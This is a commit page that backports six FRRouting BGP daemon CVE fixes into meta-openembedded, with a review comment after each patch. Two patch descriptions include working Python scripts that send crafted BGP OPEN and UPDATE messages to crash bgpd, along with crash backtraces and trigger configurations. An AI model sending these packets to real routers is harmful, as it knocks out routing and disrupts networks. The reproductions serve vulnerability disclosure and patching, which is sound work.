author | Narpat Mali <narpat.mali@windriver.com> | 2023-11-21 08:02:36 +0000 |
---|---|---|
committer | Armin Kuster <akuster808@gmail.com> | 2023-12-13 13:35:51 -0500 |
commit | cdab5037c9dea0eca042010d3b7af984edfc9f79 (patch) | |
tree | 7ec790dc11b4f2b66740a15424f714df46367e10 | |
parent | 8a75c61cce2aa1d6e5a3597ab8fc5a7e6aeae1e4 (diff) | |
download | meta-openembedded-cdab5037c9dea0eca042010d3b7af984edfc9f79.tar.gz |
frr: Fix for multiple CVE's
Backport the below CVE fixes.
CVE-2023-38406: https://security-tracker.debian.org/tracker/CVE-2023-38406
CVE-2023-38407: https://security-tracker.debian.org/tracker/CVE-2023-38407
CVE-2023-46752: https://security-tracker.debian.org/tracker/CVE-2023-46752
CVE-2023-46753: https://security-tracker.debian.org/tracker/CVE-2023-46753
CVE-2023-47234: https://security-tracker.debian.org/tracker/CVE-2023-47234
CVE-2023-47235: https://security-tracker.debian.org/tracker/CVE-2023-47235
Signed-off-by: Narpat Mali <narpat.mali@windriver.com>
Signed-off-by: Armin Kuster <akuster808@gmail.com>
7 files changed, 569 insertions, 0 deletions
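--- /dev/null
+++ b/meta-networking/recipes-protocols/frr/frr/CVE-2023-38406.patch
@@ -0,0 +1,42 @@
+From f2a5c583fc8f7c515f3d6e6f929dcbcc61f7e4b7 Mon Sep 17 00:00:00 2001
+From: Donald Sharp <sharpd@nvidia.com>
+Date: Mon, 20 Nov 2023 11:43:27 +0000
+Subject: [PATCH 1/6] bgpd: Flowspec overflow issue
+
+According to the flowspec RFC 8955 a flowspec nlri is <length, <nlri data>>
+Specifying 0 as a length makes BGP get all warm on the inside. Which
+in this case is not a good thing at all. Prevent warmth, stay cold
+on the inside.
+
+Reported-by: Iggy Frankovic <iggyfran@amazon.com>
+Signed-off-by: Donald Sharp <sharpd@nvidia.com>
+
+CVE: CVE-2023-38406
+
+Upstream-Status: Backport [https://github.com/FRRouting/frr/commit/0b999c886e241c52bd1f7ef0066700e4b618ebb3]
+
+Signed-off-by: Narpat Mali <narpat.mali@windriver.com>
+---
+bgpd/bgp_flowspec.c | 7 +++++++
+1 file changed, 7 insertions(+)
+
+diff --git a/bgpd/bgp_flowspec.c b/bgpd/bgp_flowspec.c
+index 3e2b1ac49..95fbd340a 100644
+--- a/bgpd/bgp_flowspec.c
++++ b/bgpd/bgp_flowspec.c
+@@ -148,6 +148,13 @@ int bgp_nlri_parse_flowspec(struct peer *peer, struct attr *attr,
+psize);
+return BGP_NLRI_PARSE_ERROR_PACKET_OVERFLOW;
+}
++
++ if (psize == 0) {
++ flog_err(EC_BGP_FLOWSPEC_PACKET,
++ "Flowspec NLRI length 0 which makes no sense");
++ return BGP_NLRI_PARSE_ERROR_PACKET_OVERFLOW;
++ }
++
+if (bgp_fs_nlri_validate(pnt, psize, afi) < 0) {
+flog_err(
+EC_BGP_FLOWSPEC_PACKET,
+--
+2.40.0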
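Review bot: The zero-length check returns `BGP_NLRI_PARSE_ERROR_PACKET_OVERFLOW` without a `bgp_notify_send()`, whereas the labeled-unicast fix in the same series (CVE-2023-38407) pairs its length rejection with a NOTIFICATION; whether the peer is reset here or the UPDATE is quietly dropped therefore depends on how the 8.2 caller of bgp_nlri_parse_flowspec() maps that return code, which is outside the hunk and worth confirming before merging. The code name also reads as an overflow when the condition is an empty NLRI, so a comment above the check would help the next reader: `/* RFC 8955: NLRI is <length, data>; length 0 carries no rule, reject before validation */`. bgp_nlri_parse_flowspec() starts and ends outside the hunk.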
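--- /dev/null
+++ b/meta-networking/recipes-protocols/frr/frr/CVE-2023-38407.patch
@@ -0,0 +1,63 @@
+From 3880f66bd053d1f56af74852ca57ba166d880920 Mon Sep 17 00:00:00 2001
+From: Donald Sharp <sharpd@nvidia.com>
+Date: Mon, 20 Nov 2023 12:03:29 +0000
+Subject: [PATCH 2/6] bgpd: Fix use beyond end of stream of labeled unicast
+parsing
+
+Fixes a couple crashes associated with attempting to read
+beyond the end of the stream.
+
+Reported-by: Iggy Frankovic <iggyfran@amazon.com>
+Signed-off-by: Donald Sharp <sharpd@nvidia.com>
+
+CVE: CVE-2023-38407
+
+Upstream-Status: Backport [https://github.com/FRRouting/frr/commit/7404a914b0cafe046703c8381903a80d3def8f8b]
+
+Signed-off-by: Narpat Mali <narpat.mali@windriver.com>
+---
+bgpd/bgp_label.c | 15 +++++++++++++++
+1 file changed, 15 insertions(+)
+
+diff --git a/bgpd/bgp_label.c b/bgpd/bgp_label.c
+index 4a20f2c09..b65c98e86 100644
+--- a/bgpd/bgp_label.c
++++ b/bgpd/bgp_label.c
+@@ -299,6 +299,9 @@ static int bgp_nlri_get_labels(struct peer *peer, uint8_t *pnt, uint8_t plen,
+uint8_t llen = 0;
+uint8_t label_depth = 0;
+
++ if (plen < BGP_LABEL_BYTES)
++ return 0;
++
+for (; data < lim; data += BGP_LABEL_BYTES) {
+memcpy(label, data, BGP_LABEL_BYTES);
+llen += BGP_LABEL_BYTES;
+@@ -361,6 +364,9 @@ int bgp_nlri_parse_label(struct peer *peer, struct attr *attr,
+memcpy(&addpath_id, pnt, BGP_ADDPATH_ID_LEN);
+addpath_id = ntohl(addpath_id);
+pnt += BGP_ADDPATH_ID_LEN;
++
++ if (pnt >= lim)
++ return BGP_NLRI_PARSE_ERROR_PACKET_OVERFLOW;
+}
+
+/* Fetch prefix length. */
+@@ -379,6 +385,15 @@ int bgp_nlri_parse_label(struct peer *peer, struct attr *attr,
+
+/* Fill in the labels */
+llen = bgp_nlri_get_labels(peer, pnt, psize, &label);
++ if (llen == 0) {
++ flog_err(
++ EC_BGP_UPDATE_RCV,
++ "%s [Error] Update packet error (wrong label length 0)",
++ peer->host);
++ bgp_notify_send(peer, BGP_NOTIFY_UPDATE_ERR,
++ BGP_NOTIFY_UPDATE_INVAL_NETWORK);
++ return BGP_NLRI_PARSE_ERROR_LABEL_LENGTH;
++ }
+p.prefixlen = prefixlen - BSIZE(llen);
+
+/* There needs to be at least one label */
+--
+2.40.0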
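Review bot: The new `plen < BGP_LABEL_BYTES` guard in bgp_nlri_get_labels() only rules out fewer than three bytes; if `lim` is `pnt + plen` (its initialisation is above the hunk), a `plen` that is not a multiple of `BGP_LABEL_BYTES` still lets the loop's `memcpy(label, data, BGP_LABEL_BYTES)` read one or two bytes past `lim` on its last pass whenever no earlier label carried the bottom-of-stack bit. Making the loop condition `for (; data + BGP_LABEL_BYTES <= lim; data += BGP_LABEL_BYTES)` bounds every read without touching the normal path. In bgp_nlri_parse_label(), the `p.prefixlen = prefixlen - BSIZE(llen)` that follows the new `llen == 0` check can still underflow if `llen` exceeds the bits in `prefixlen`; the check after the "at least one label" comment (outside the hunk) may cover that, but it runs after the subtraction has already happened. Both functions start and end outside the hunk.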
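--- /dev/null
+++ b/meta-networking/recipes-protocols/frr/frr/CVE-2023-46752.patch
@@ -0,0 +1,127 @@
+From 1c4882b83a1db705abd5d384dd0b7ef4c0e3b4ee Mon Sep 17 00:00:00 2001
+From: Donatas Abraitis <donatas@opensourcerouting.org>
+Date: Mon, 20 Nov 2023 14:11:13 +0000
+Subject: [PATCH 3/6] bgpd: Handle MP_REACH_NLRI malformed packets with session
+reset
+
+Avoid crashing bgpd.
+
+```
+(gdb)
+bgp_mp_reach_parse (args=<optimized out>, mp_update=0x7fffffffe140) at bgpd/bgp_attr.c:2341
+2341 stream_get(&attr->mp_nexthop_global, s, IPV6_MAX_BYTELEN);
+(gdb)
+stream_get (dst=0x7fffffffe1ac, s=0x7ffff0006e80, size=16) at lib/stream.c:320
+320 {
+(gdb)
+321 STREAM_VERIFY_SANE(s);
+(gdb)
+323 if (STREAM_READABLE(s) < size) {
+(gdb)
+34 return __builtin___memcpy_chk (__dest, __src, __len, __bos0 (__dest));
+(gdb)
+
+Thread 1 "bgpd" received signal SIGSEGV, Segmentation fault.
+0x00005555556e37be in route_set_aspath_prepend (rule=0x555555aac0d0, prefix=0x7fffffffe050,
+object=0x7fffffffdb00) at bgpd/bgp_routemap.c:2282
+2282 if (path->attr->aspath->refcnt)
+(gdb)
+```
+
+With the configuration:
+
+```
+neighbor 127.0.0.1 remote-as external
+neighbor 127.0.0.1 passive
+neighbor 127.0.0.1 ebgp-multihop
+neighbor 127.0.0.1 disable-connected-check
+neighbor 127.0.0.1 update-source 127.0.0.2
+neighbor 127.0.0.1 timers 3 90
+neighbor 127.0.0.1 timers connect 1
+address-family ipv4 unicast
+redistribute connected
+neighbor 127.0.0.1 default-originate
+neighbor 127.0.0.1 route-map RM_IN in
+exit-address-family
+!
+route-map RM_IN permit 10
+set as-path prepend 200
+exit
+```
+
+Reported-by: Iggy Frankovic <iggyfran@amazon.com>
+Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org>
+
+CVE: CVE-2023-46752
+
+Upstream-Status: Backport [https://github.com/FRRouting/frr/commit/b08afc81c60607a4f736f418f2e3eb06087f1a35]
+
+Signed-off-by: Narpat Mali <narpat.mali@windriver.com>
+---
+bgpd/bgp_attr.c | 6 +-----
+bgpd/bgp_attr.h | 1 -
+bgpd/bgp_packet.c | 6 +-----
+3 files changed, 2 insertions(+), 11 deletions(-)
+
+diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c
+index b10a60351..e0542356c 100644
+--- a/bgpd/bgp_attr.c
++++ b/bgpd/bgp_attr.c
+@@ -2207,7 +2207,7 @@ int bgp_mp_reach_parse(struct bgp_attr_parser_args *args,
+
+mp_update->afi = afi;
+mp_update->safi = safi;
+- return BGP_ATTR_PARSE_EOR;
++ return bgp_attr_malformed(args, BGP_NOTIFY_UPDATE_MAL_ATTR, 0);
+}
+
+mp_update->afi = afi;
+@@ -3345,10 +3345,6 @@ bgp_attr_parse_ret_t bgp_attr_parse(struct peer *peer, struct attr *attr,
+goto done;
+}
+
+- if (ret == BGP_ATTR_PARSE_EOR) {
+- goto done;
+- }
+-
+if (ret == BGP_ATTR_PARSE_ERROR) {
+flog_warn(EC_BGP_ATTRIBUTE_PARSE_ERROR,
+"%s: Attribute %s, parse error", peer->host,
+diff --git a/bgpd/bgp_attr.h b/bgpd/bgp_attr.h
+index 781bfdec3..69f962134 100644
+--- a/bgpd/bgp_attr.h
++++ b/bgpd/bgp_attr.h
+@@ -378,7 +378,6 @@ typedef enum {
+/* only used internally, send notify + convert to BGP_ATTR_PARSE_ERROR
+*/
+BGP_ATTR_PARSE_ERROR_NOTIFYPLS = -3,
+- BGP_ATTR_PARSE_EOR = -4,
+} bgp_attr_parse_ret_t;
+
+struct bpacket_attr_vec_arr;
+diff --git a/bgpd/bgp_packet.c b/bgpd/bgp_packet.c
+index 2fd28aae3..261695198 100644
+--- a/bgpd/bgp_packet.c
++++ b/bgpd/bgp_packet.c
+@@ -1843,8 +1843,7 @@ static int bgp_update_receive(struct peer *peer, bgp_size_t size)
+* Non-MP IPv4/Unicast EoR is a completely empty UPDATE
+* and MP EoR should have only an empty MP_UNREACH
+*/
+- if ((!update_len && !withdraw_len && nlris[NLRI_MP_UPDATE].length == 0)
+- || (attr_parse_ret == BGP_ATTR_PARSE_EOR)) {
++ if (!update_len && !withdraw_len && nlris[NLRI_MP_UPDATE].length == 0) {
+afi_t afi = 0;
+safi_t safi;
+struct graceful_restart_info *gr_info;
+@@ -1865,9 +1864,6 @@ static int bgp_update_receive(struct peer *peer, bgp_size_t size)
+&& nlris[NLRI_MP_WITHDRAW].length == 0) {
+afi = nlris[NLRI_MP_WITHDRAW].afi;
+safi = nlris[NLRI_MP_WITHDRAW].safi;
+- } else if (attr_parse_ret == BGP_ATTR_PARSE_EOR) {
+- afi = nlris[NLRI_MP_UPDATE].afi;
+- safi = nlris[NLRI_MP_UPDATE].safi;
+}
+
+if (afi && peer->afc[afi][safi]) {
+--
+2.40.0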
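Review bot: In the bgp_attr.c hunk the two stores `mp_update->afi = afi;` and `mp_update->safi = safi;` now sit directly in front of `return bgp_attr_malformed(args, BGP_NOTIFY_UPDATE_MAL_ATTR, 0);`, populating an NLRI descriptor for an UPDATE that is being rejected; dropping them makes the branch read as a pure rejection and avoids handing the caller a half-filled `mp_update` on an error path. Removing `BGP_ATTR_PARSE_EOR` also changes behaviour for a peer that signals End-of-RIB with an empty MP_REACH_NLRI: the deleted bgp_packet.c branches used to treat that as EoR, and it now earns a MAL_ATTR NOTIFICATION and a session reset, which is the stated intent but deserves one explicit sentence in the patch header for anyone later bisecting peering flaps. The enclosing functions start and end outside the hunks.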
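--- /dev/null
+++ b/meta-networking/recipes-protocols/frr/frr/CVE-2023-46753.patch
@@ -0,0 +1,119 @@
+From 60bd794a9cf6df05503a062e113161dcbdbfac9d Mon Sep 17 00:00:00 2001
+From: Donatas Abraitis <donatas@opensourcerouting.org>
+Date: Mon, 20 Nov 2023 14:22:22 +0000
+Subject: [PATCH 4/6] bgpd: Check mandatory attributes more carefully for
+UPDATE message
+
+If we send a crafted BGP UPDATE message without mandatory attributes, we do
+not check if the length of the path attributes is zero or not. We only check
+if attr->flag is at least set or not. Imagine we send only unknown transit
+attribute, then attr->flag is always 0. Also, this is true only if graceful-restart
+capability is received.
+
+A crash:
+
+```
+bgpd[7834]: [TJ23Y-GY0RH] 127.0.0.1 Unknown attribute is received (type 31, length 16)
+bgpd[7834]: [PCFFM-WMARW] 127.0.0.1(donatas-pc) rcvd UPDATE wlen 0 attrlen 20 alen 17
+BGP[7834]: Received signal 11 at 1698089639 (si_addr 0x0, PC 0x55eefd375b4a); aborting...
+BGP[7834]: /usr/local/lib/libfrr.so.0(zlog_backtrace_sigsafe+0x6d) [0x7f3205ca939d]
+BGP[7834]: /usr/local/lib/libfrr.so.0(zlog_signal+0xf3) [0x7f3205ca9593]
+BGP[7834]: /usr/local/lib/libfrr.so.0(+0xf5181) [0x7f3205cdd181]
+BGP[7834]: /lib/x86_64-linux-gnu/libpthread.so.0(+0x12980) [0x7f3204ff3980]
+BGP[7834]: /usr/lib/frr/bgpd(+0x18ab4a) [0x55eefd375b4a]
+BGP[7834]: /usr/local/lib/libfrr.so.0(route_map_apply_ext+0x310) [0x7f3205cd1290]
+BGP[7834]: /usr/lib/frr/bgpd(+0x163610) [0x55eefd34e610]
+BGP[7834]: /usr/lib/frr/bgpd(bgp_update+0x9a5) [0x55eefd35c1d5]
+BGP[7834]: /usr/lib/frr/bgpd(bgp_nlri_parse_ip+0xb7) [0x55eefd35e867]
+BGP[7834]: /usr/lib/frr/bgpd(+0x1555e6) [0x55eefd3405e6]
+BGP[7834]: /usr/lib/frr/bgpd(bgp_process_packet+0x747) [0x55eefd345597]
+BGP[7834]: /usr/local/lib/libfrr.so.0(event_call+0x83) [0x7f3205cef4a3]
+BGP[7834]: /usr/local/lib/libfrr.so.0(frr_run+0xc0) [0x7f3205ca10a0]
+BGP[7834]: /usr/lib/frr/bgpd(main+0x409) [0x55eefd2dc979]
+```
+
+Sending:
+
+```
+import socket
+import time
+
+OPEN = (b"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+b"\xff\xff\x00\x62\x01\x04\xfd\xea\x00\x5a\x0a\x00\x00\x01\x45\x02"
+b"\x06\x01\x04\x00\x01\x00\x01\x02\x02\x02\x00\x02\x02\x46\x00\x02"
+b"\x06\x41\x04\x00\x00\xfd\xea\x02\x02\x06\x00\x02\x06\x45\x04\x00"
+b"\x01\x01\x03\x02\x0e\x49\x0c\x0a\x64\x6f\x6e\x61\x74\x61\x73\x2d"
+b"\x70\x63\x00\x02\x04\x40\x02\x00\x78\x02\x09\x47\x07\x00\x01\x01"
+b"\x80\x00\x00\x00")
+
+KEEPALIVE = (b"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+b"\xff\xff\xff\xff\xff\xff\x00\x13\x04")
+
+UPDATE = bytearray.fromhex("ffffffffffffffffffffffffffffffff003c0200000014ff1f001000040146464646460004464646464646664646f50d05800100010200ffff000000")
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect(('127.0.0.2', 179))
+s.send(OPEN)
+data = s.recv(1024)
+s.send(KEEPALIVE)
+data = s.recv(1024)
+s.send(UPDATE)
+data = s.recv(1024)
+time.sleep(1000)
+s.close()
+```
+
+Reported-by: Iggy Frankovic <iggyfran@amazon.com>
+Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org>
+
+CVE: CVE-2023-46753
+
+Upstream-Status: Backport [https://github.com/FRRouting/frr/commit/d8482bf011cb2b173e85b65b4bf3d5061250cdb9]
+
+Signed-off-by: Narpat Mali <narpat.mali@windriver.com>
+---
+bgpd/bgp_attr.c | 10 ++++++----
+1 file changed, 6 insertions(+), 4 deletions(-)
+
+diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c
+index e0542356c..35122943e 100644
+--- a/bgpd/bgp_attr.c
++++ b/bgpd/bgp_attr.c
+@@ -3044,13 +3044,15 @@ static bgp_attr_parse_ret_t bgp_attr_unknown(struct bgp_attr_parser_args *args)
+}
+
+/* Well-known attribute check. */
+-static int bgp_attr_check(struct peer *peer, struct attr *attr)
++static int bgp_attr_check(struct peer *peer, struct attr *attr,
++ bgp_size_t length)
+{
+uint8_t type = 0;
+
+/* BGP Graceful-Restart End-of-RIB for IPv4 unicast is signaled as an
+* empty UPDATE. */
+- if (CHECK_FLAG(peer->cap, PEER_CAP_RESTART_RCV) && !attr->flag)
++ if (CHECK_FLAG(peer->cap, PEER_CAP_RESTART_RCV) && !attr->flag &&
++ !length)
+return BGP_ATTR_PARSE_PROCEED;
+
+/* "An UPDATE message that contains the MP_UNREACH_NLRI is not required
+@@ -3101,7 +3103,7 @@ bgp_attr_parse_ret_t bgp_attr_parse(struct peer *peer, struct attr *attr,
+bgp_attr_parse_ret_t ret;
+uint8_t flag = 0;
+uint8_t type = 0;
+- bgp_size_t length;
++ bgp_size_t length = 0;
+uint8_t *startp, *endp;
+uint8_t *attr_endp;
+uint8_t seen[BGP_ATTR_BITMAP_SIZE];
+@@ -3416,7 +3418,7 @@ bgp_attr_parse_ret_t bgp_attr_parse(struct peer *peer, struct attr *attr,
+}
+
+/* Check all mandatory well-known attributes are present */
+- ret = bgp_attr_check(peer, attr);
++ ret = bgp_attr_check(peer, attr, length);
+if (ret < 0)
+goto done;
+
+--
+2.40.0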
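Review bot: The `length` handed to `bgp_attr_check(peer, attr, length)` is the per-attribute local of bgp_attr_parse() (declared alongside `flag` and `type` and now zero-initialised in this hunk), so after the loop it holds the length of the last attribute parsed rather than the size of the whole path-attribute section; an UPDATE whose final attribute carries a zero-length body would then still satisfy `!attr->flag && !length` and take the `PROCEED` branch this patch is meant to narrow. If the intent is "no attributes at all", passing the section length — bgp_attr_parse()'s `size` parameter, if that is what it carries in 8.2 — states it directly: `ret = bgp_attr_check(peer, attr, size);`. Either way the new parameter deserves a comment on the prototype, e.g. `/* length: path-attribute bytes seen; 0 only for an empty (End-of-RIB) UPDATE */`. The loop that assigns `length` per attribute is outside the hunk.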
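--- /dev/null
+++ b/meta-networking/recipes-protocols/frr/frr/CVE-2023-47234.patch
@@ -0,0 +1,98 @@
+From 682f100cd8d1bf7510939faa033f69ce64f965e9 Mon Sep 17 00:00:00 2001
+From: Donatas Abraitis <donatas@opensourcerouting.org>
+Date: Mon, 20 Nov 2023 14:32:38 +0000
+Subject: [PATCH 5/6] bgpd: Ignore handling NLRIs if we received
+MP_UNREACH_NLRI
+
+If we receive MP_UNREACH_NLRI, we should stop handling remaining NLRIs if
+no mandatory path attributes received.
+
+In other words, if MP_UNREACH_NLRI received, the remaining NLRIs should be handled
+as a new data, but without mandatory attributes, it's a malformed packet.
+
+In normal case, this MUST not happen at all, but to avoid crashing bgpd, we MUST
+handle that.
+
+Reported-by: Iggy Frankovic <iggyfran@amazon.com>
+Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org>
+
+CVE: CVE-2023-47234
+
+Upstream-Status: Backport [https://github.com/FRRouting/frr/commit/c37119df45bbf4ef713bc10475af2ee06e12f3bf]
+
+Signed-off-by: Narpat Mali <narpat.mali@windriver.com>
+---
+bgpd/bgp_attr.c | 19 ++++++++++---------
+bgpd/bgp_attr.h | 1 +
+bgpd/bgp_packet.c | 7 ++++++-
+3 files changed, 17 insertions(+), 10 deletions(-)
+
+diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c
+index 35122943e..13da27e99 100644
+--- a/bgpd/bgp_attr.c
++++ b/bgpd/bgp_attr.c
+@@ -3055,15 +3055,6 @@ static int bgp_attr_check(struct peer *peer, struct attr *attr,
+!length)
+return BGP_ATTR_PARSE_PROCEED;
+
+- /* "An UPDATE message that contains the MP_UNREACH_NLRI is not required
+- to carry any other path attributes.", though if MP_REACH_NLRI or NLRI
+- are present, it should. Check for any other attribute being present
+- instead.
+- */
+- if ((!CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_MP_REACH_NLRI)) &&
+- CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_MP_UNREACH_NLRI))))
+- return BGP_ATTR_PARSE_PROCEED;
+-
+if (!CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_ORIGIN)))
+type = BGP_ATTR_ORIGIN;
+
+@@ -3082,6 +3073,16 @@ static int bgp_attr_check(struct peer *peer, struct attr *attr,
+&& !CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_LOCAL_PREF)))
+type = BGP_ATTR_LOCAL_PREF;
+
++ /* An UPDATE message that contains the MP_UNREACH_NLRI is not required
++ * to carry any other path attributes. Though if MP_REACH_NLRI or NLRI
++ * are present, it should. Check for any other attribute being present
++ * instead.
++ */
++ if (!CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_MP_REACH_NLRI)) &&
++ CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_MP_UNREACH_NLRI)))
++ return type ? BGP_ATTR_PARSE_MISSING_MANDATORY
++ : BGP_ATTR_PARSE_PROCEED;
++
+/* If any of the well-known mandatory attributes are not present
+* in an UPDATE message, then "treat-as-withdraw" MUST be used.
+*/
+diff --git a/bgpd/bgp_attr.h b/bgpd/bgp_attr.h
+index 69f962134..77640dd5b 100644
+--- a/bgpd/bgp_attr.h
++++ b/bgpd/bgp_attr.h
+@@ -378,6 +378,7 @@ typedef enum {
+/* only used internally, send notify + convert to BGP_ATTR_PARSE_ERROR
+*/
+BGP_ATTR_PARSE_ERROR_NOTIFYPLS = -3,
++ BGP_ATTR_PARSE_MISSING_MANDATORY = -4,
+} bgp_attr_parse_ret_t;
+
+struct bpacket_attr_vec_arr;
+diff --git a/bgpd/bgp_packet.c b/bgpd/bgp_packet.c
+index 261695198..c1c28f344 100644
+--- a/bgpd/bgp_packet.c
++++ b/bgpd/bgp_packet.c
+@@ -1767,7 +1767,12 @@ static int bgp_update_receive(struct peer *peer, bgp_size_t size)
+/* Network Layer Reachability Information. */
+update_len = end - stream_pnt(s);
+
+- if (update_len && attribute_len) {
++ /* If we received MP_UNREACH_NLRI attribute, but also NLRIs, then
++ * NLRIs should be handled as a new data. Though, if we received
++ * NLRIs without mandatory attributes, they should be ignored.
++ */
++ if (update_len && attribute_len &&
++ attr_parse_ret != BGP_ATTR_PARSE_MISSING_MANDATORY) {
+/* Set NLRI portion to structure. */
+nlris[NLRI_UPDATE].afi = AFI_IP;
+nlris[NLRI_UPDATE].safi = SAFI_UNICAST;
+--
+2.40.0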
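Review bot: `BGP_ATTR_PARSE_MISSING_MANDATORY = -4` is a new negative result, so every `ret < 0` or `!= BGP_ATTR_PARSE_PROCEED` test along bgp_attr_parse()'s `done:` path and in bgp_update_receive() (all outside these hunks) now sees a value they were written without; if any of them resets the session or skips attribute cleanup, the MP_UNREACH_NLRI withdraws this patch means to keep processing would never run, which matters because the series was written against master and is being applied to stable/8.2. It also reuses the -4 slot that CVE-2023-46752 just freed, so the two patches must stay in order. The enum member should carry a comment like its neighbour: `/* mandatory attrs missing but MP_UNREACH_NLRI present: process withdraws, ignore NLRIs */`. The `type ? ... : ...` return relies on the mandatory-attribute checks above it having set `type`, which is why the MP_UNREACH block moved below them; a one-line comment saying so saves the next reader the diff archaeology.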
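--- /dev/null
+++ b/meta-networking/recipes-protocols/frr/frr/CVE-2023-47235.patch
@@ -0,0 +1,114 @@
+From 024bdfcdf1d52db3a74f00a3370c3834a4bb78d0 Mon Sep 17 00:00:00 2001
+From: Donatas Abraitis <donatas@opensourcerouting.org>
+Date: Mon, 20 Nov 2023 14:39:33 +0000
+Subject: [PATCH 6/6] bgpd: Treat EOR as withdrawn to avoid unwanted handling
+of malformed attrs
+
+Treat-as-withdraw, otherwise if we just ignore it, we will pass it to be
+processed as a normal UPDATE without mandatory attributes, that could lead
+to harmful behavior. In this case, a crash for route-maps with the configuration
+such as:
+
+```
+router bgp 65001
+no bgp ebgp-requires-policy
+neighbor 127.0.0.1 remote-as external
+neighbor 127.0.0.1 passive
+neighbor 127.0.0.1 ebgp-multihop
+neighbor 127.0.0.1 disable-connected-check
+neighbor 127.0.0.1 update-source 127.0.0.2
+neighbor 127.0.0.1 timers 3 90
+neighbor 127.0.0.1 timers connect 1
+!
+address-family ipv4 unicast
+neighbor 127.0.0.1 addpath-tx-all-paths
+neighbor 127.0.0.1 default-originate
+neighbor 127.0.0.1 route-map RM_IN in
+exit-address-family
+exit
+!
+route-map RM_IN permit 10
+set as-path prepend 200
+exit
+```
+
+Send a malformed optional transitive attribute:
+
+```
+import socket
+import time
+
+OPEN = (b"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+b"\xff\xff\x00\x62\x01\x04\xfd\xea\x00\x5a\x0a\x00\x00\x01\x45\x02"
+b"\x06\x01\x04\x00\x01\x00\x01\x02\x02\x02\x00\x02\x02\x46\x00\x02"
+b"\x06\x41\x04\x00\x00\xfd\xea\x02\x02\x06\x00\x02\x06\x45\x04\x00"
+b"\x01\x01\x03\x02\x0e\x49\x0c\x0a\x64\x6f\x6e\x61\x74\x61\x73\x2d"
+b"\x70\x63\x00\x02\x04\x40\x02\x00\x78\x02\x09\x47\x07\x00\x01\x01"
+b"\x80\x00\x00\x00")
+
+KEEPALIVE = (b"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+b"\xff\xff\xff\xff\xff\xff\x00\x13\x04")
+
+UPDATE = bytearray.fromhex("ffffffffffffffffffffffffffffffff002b0200000003c0ff00010100eb00ac100b0b001ad908ac100b0b")
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect(('127.0.0.2', 179))
+s.send(OPEN)
+data = s.recv(1024)
+s.send(KEEPALIVE)
+data = s.recv(1024)
+s.send(UPDATE)
+data = s.recv(1024)
+time.sleep(100)
+s.close()
+```
+
+Reported-by: Iggy Frankovic <iggyfran@amazon.com>
+Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org>
+
+CVE: CVE-2023-47235
+
+Upstream-Status: Backport [https://github.com/FRRouting/frr/commit/6814f2e0138a6ea5e1f83bdd9085d9a77999900b]
+
+Signed-off-by: Narpat Mali <narpat.mali@windriver.com>
+---
+bgpd/bgp_attr.c | 15 ++++++++++++---
+1 file changed, 12 insertions(+), 3 deletions(-)
+
+diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c
+index 13da27e99..1e08a218e 100644
+--- a/bgpd/bgp_attr.c
++++ b/bgpd/bgp_attr.c
+@@ -3050,10 +3050,13 @@ static int bgp_attr_check(struct peer *peer, struct attr *attr,
+uint8_t type = 0;
+
+/* BGP Graceful-Restart End-of-RIB for IPv4 unicast is signaled as an
+- * empty UPDATE. */
++ * empty UPDATE. Treat-as-withdraw, otherwise if we just ignore it,
++ * we will pass it to be processed as a normal UPDATE without mandatory
++ * attributes, that could lead to harmful behavior.
++ */
+if (CHECK_FLAG(peer->cap, PEER_CAP_RESTART_RCV) && !attr->flag &&
+!length)
+- return BGP_ATTR_PARSE_PROCEED;
++ return BGP_ATTR_PARSE_WITHDRAW;
+
+if (!CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_ORIGIN)))
+type = BGP_ATTR_ORIGIN;
+@@ -3477,7 +3480,13 @@ done:
+}
+
+transit = bgp_attr_get_transit(attr);
+- if (ret != BGP_ATTR_PARSE_ERROR) {
++ /* If we received an UPDATE with mandatory attributes, then
++ * the unrecognized transitive optional attribute of that
++ * path MUST be passed. Otherwise, it's an error, and from
++ * security perspective it might be very harmful if we continue
++ * here with the unrecognized attributes.
++ */
++ if (ret == BGP_ATTR_PARSE_PROCEED) {
+/* Finally intern unknown attribute. */
+if (transit)
+bgp_attr_set_transit(attr, transit_intern(transit));
+--
+2.40.0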
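Review bot: Narrowing the intern step to `ret == BGP_ATTR_PARSE_PROCEED` means `transit` (and whatever else that block interns) is no longer interned for `BGP_ATTR_PARSE_WITHDRAW` and `BGP_ATTR_PARSE_MISSING_MANDATORY`; the branch that releases `transit` for error results lies below the hunk, so confirm it also frees it for those two values, otherwise each treat-as-withdraw UPDATE carrying an unknown transitive attribute could leak the allocation made while parsing it. Returning `BGP_ATTR_PARSE_WITHDRAW` for a legitimate End-of-RIB also routes it through the treat-as-withdraw handling in bgp_update_receive(), presumably harmless with no NLRI present but a behaviour change worth a sentence in the header. The rewritten comment describes what is avoided rather than what happens; `/* Empty UPDATE = End-of-RIB. Treat-as-withdraw so it is never installed as a route lacking mandatory attributes (route-maps dereference aspath). */` says both. Both functions start and end outside the hunk.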
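--- a/meta-networking/recipes-protocols/frr/frr_8.2.2.bb
+++ b/meta-networking/recipes-protocols/frr/frr_8.2.2.bb
@@ -21,6 +21,12 @@ SRC_URI = "git://github.com/FRRouting/frr.git;protocol=https;branch=stable/8.2 \
 file://CVE-2023-38802.patch \
 file://CVE-2023-41358.patch \
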